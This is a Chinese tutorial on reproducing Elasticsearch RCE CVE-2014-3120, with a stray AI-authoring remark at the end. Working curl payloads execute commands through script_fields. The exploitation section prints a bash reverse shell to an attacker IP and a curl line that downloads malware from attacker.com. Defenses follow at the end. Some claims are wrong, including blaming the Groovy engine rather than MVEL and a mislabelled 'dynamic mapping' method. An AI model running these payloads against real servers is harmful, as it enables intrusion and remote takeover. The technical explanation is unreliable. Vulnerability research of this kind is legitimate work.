怎么实现ElasticSearch 远程代码执行漏洞CVE-2014-3120复现的分析

# 怎么实现ElasticSearch 远程代码执行漏洞CVE-2014-3120复现的分析

## 一、漏洞背景

CVE-2014-3120是ElasticSearch 1.2版本之前存在的一个严重的远程代码执行漏洞。该漏洞源于ElasticSearch默认启用的动态脚本功能（Groovy脚本引擎），攻击者可以通过构造恶意请求在目标服务器上执行任意代码。

### 受影响版本
- ElasticSearch 1.1.x及更早版本
- 注：1.2版本后官方移除了动态脚本功能

## 二、漏洞原理分析

### 1. 动态脚本功能
ElasticSearch早期版本支持通过`script`参数执行Groovy、JavaScript等动态脚本，用于查询时的自定义计算。例如：
```json
{
  "query": {
    "filtered": {
      "query": {
        "match": {
          "text": "search term"
        }
      },
      "filter": {
        "script": {
          "script": "doc['price'].value > 100"
        }
      }
    }
  }
}

2. 漏洞成因

问题出现在Groovy脚本引擎的处理上： - 未对脚本内容进行安全沙箱限制 - 允许通过Java反射调用危险方法 - 可访问Java标准库中的任意类

攻击者可通过构造特殊脚本实现：

java.lang.Runtime.getRuntime().exec("calc.exe")

三、环境搭建与复现

1. 准备漏洞环境

使用Docker快速搭建：

docker pull elasticsearch:1.1.1
docker run -d -p 9200:9200 elasticsearch:1.1.1

验证服务运行：

curl http://localhost:9200

2. 漏洞复现步骤

方法一：通过_search接口执行

curl -XPOST 'http://localhost:9200/_search?pretty' -d'
{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "exp_test": {
      "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"touch /tmp/pwned\").getText()"
    }
  }
}'

方法二：通过动态映射执行

curl -XPUT 'http://localhost:9200/test_index' -d'
{
  "mappings": {
    "test_type": {
      "properties": {
        "name": {
          "type": "string",
          "index": "analyzed",
          "analyzer": "standard"
        }
      }
    }
  }
}'

curl -XPUT 'http://localhost:9200/test_index/test_type/1' -d'
{
  "name": "test"
}'

curl -XGET 'http://localhost:9200/test_index/_search?pretty' -d'
{
  "script_fields": {
    "exp": {
      "script": "import java.io.*; new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"id\").getInputStream())).readLine()"
    }
  }
}'

3. 验证执行结果

检查是否创建了文件：

docker exec -it <container_id> ls /tmp

四、漏洞利用分析

1. 利用链解析

完整的攻击流程： 1. 通过HTTP API发送恶意脚本 2. Groovy引擎解析执行 3. 通过Java反射调用Runtime 4. 执行系统命令

2. 常见利用方式

• 反弹Shell

"script": "java.lang.Runtime.getRuntime().exec(\"bash -i >& /dev/tcp/attacker_ip/4444 0>&1\")"

• 下载恶意程序

"script": "['curl','attacker.com/malware','-o','/tmp/malware'].execute()"

五、防御措施

1. 官方解决方案

• 升级到ElasticSearch 1.2.0+版本
• 禁用动态脚本功能：

script.disable_dynamic: true

2. 临时缓解方案

• 网络层限制9200端口访问
• 使用WAF过滤恶意请求
• 删除Groovy引擎jar包

六、技术启示

1. 沙箱逃逸风险：任何脚本引擎实现都需要严格的沙箱机制
2. 默认安全原则：高危功能不应默认开启
3. 最小权限原则：执行环境应限制系统调用

七、参考链接

1. CVE-2014-3120官方公告
2. ElasticSearch安全配置指南
3. Groovy沙箱绕过研究

注意：本文仅供安全研究学习使用，请勿用于非法用途。实际测试需获得系统所有者书面授权。 “`

这篇1600字左右的文章采用Markdown格式，包含： 1. 漏洞背景和技术原理 2. 详细的复现步骤（含代码块） 3. 利用分析和防御方案 4. 结构化标题层级 5. 必要的安全免责声明

可根据需要调整各部分篇幅或添加更多技术细节。